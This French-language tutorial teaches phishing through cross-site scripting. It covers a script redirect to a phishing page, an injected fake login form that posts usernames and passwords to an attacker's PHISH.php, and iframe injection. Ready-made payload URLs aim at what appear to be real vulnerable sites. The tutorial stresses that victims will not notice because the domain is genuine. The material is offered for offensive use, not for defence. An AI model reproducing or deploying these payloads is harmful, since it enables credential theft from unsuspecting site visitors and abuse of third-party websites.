Le phishing
2.1 Le XRP : xss redirect phishing :
Le XRP c'est du phishing normal , vous faite une page phishing le plus normalement du monde (vous copiez le site , modifier le formulaire de façons a récupérer les données...).
Ensuite on utilise l'xss de façon à ce que le site vulnérable redirige la victime sur votre page phishing , la victime ne verra que du feu ! .
Un peut de pratique , prenons l'exemple de ce site vulnérable :
http://directorybin.com/index.php?q=
On va maintenant injecter un code basic qui va rediriger la victime sur notre page phishing .
http://directorybin.com/index.php?q=search="'><script>document.location.href="http://Url.page.phishing.com"</script>
Par exemple quand la victime accède à ce lien , elle sera redirigé vers votre page phishing , et elle se connectera , la victime ne se doutera pas que c'est une page phishing car elle a vue que le nom de domaine est exact .
Aussi si la faille est présente sur un livre d'or , elle va rediriger toutes les personne qui visitent le livre d'or vers votre page qui va leur demander leur login et pass .
2.2 : Xss Html inject Phishing
Tout est dans le titre , débrouillez vous.... euh non je vais expliquer :
Cette méthode consiste à injecter un code html d'un fake formulaire de connexion sur une page d'un site.
Par exemple on prend ce site :
http://directorybin.com/index.php?q=
et on lui injecte un code html d'un fake formulaire de connexion :
"'><html><head><meta content="text/html; charset=ISO-8859-1"http-equiv="content-type"/> <title></title></head><body><div style="text-align: center;"> <form Method="POST" Action="PHISH.php" Name="form">Page de phishing : <br /><br/> Login :<br /> <input name="login" /><br />Password :<br/> <input name="Password" type="password" /><br /><br /> <inputname="Valid" value="login" type="submit" /> <br /></form></div></body></html>
Le résultat final :
http://directorybin.com/index.php?q="'><html><head><meta content="text/html; charset=ISO-8859-1"http-equiv="content-type"/> <title></title></head><body><div style="text-align: center;"><form Method="POST" Action="PHISH.php" Name="form">Page de Phishing: <br /><br/>Login :<br /> <input name="login" /><br />Password : <br/> <input name="Password" type="password" /><br /><br /> <input name="Valid" value="login" type="submit" /><br /> </form></div></body></html>
Si vous revisitez le site, regardez la différence entre la page original et celle qu'on a modifié .
Remarque :Vous devez remplacer "PHISH.php" par votre phishing.php (exemple : http://votresite.com/phishing.php ).
Exemple d'un Phishing.php :
2.3 : Le phishing par iframe :
Le phishing par iframe c'est comme l'union des deux technique qu'on a vue , elle ouvre une iframe sur le site original avec votre page phishing dedans !
Exemple :
http://www.exemple.com/index.php?search=
On va maintenant injecter une iframe qui affichera votre page phishing , dans ce cas on va mettre google :
"'><iframe src="http://google.Com" height="300" width="800"></iframe>
et le résultat final :
http://www.romow.com/index.php?search="'><iframe src="http://google.Com" height="450" width="900"></iframe>
Ce cours touche à sa fin !
Je remercie SH@Ð0W pour ce super tutoriel et ₲alƒer pour les corrections.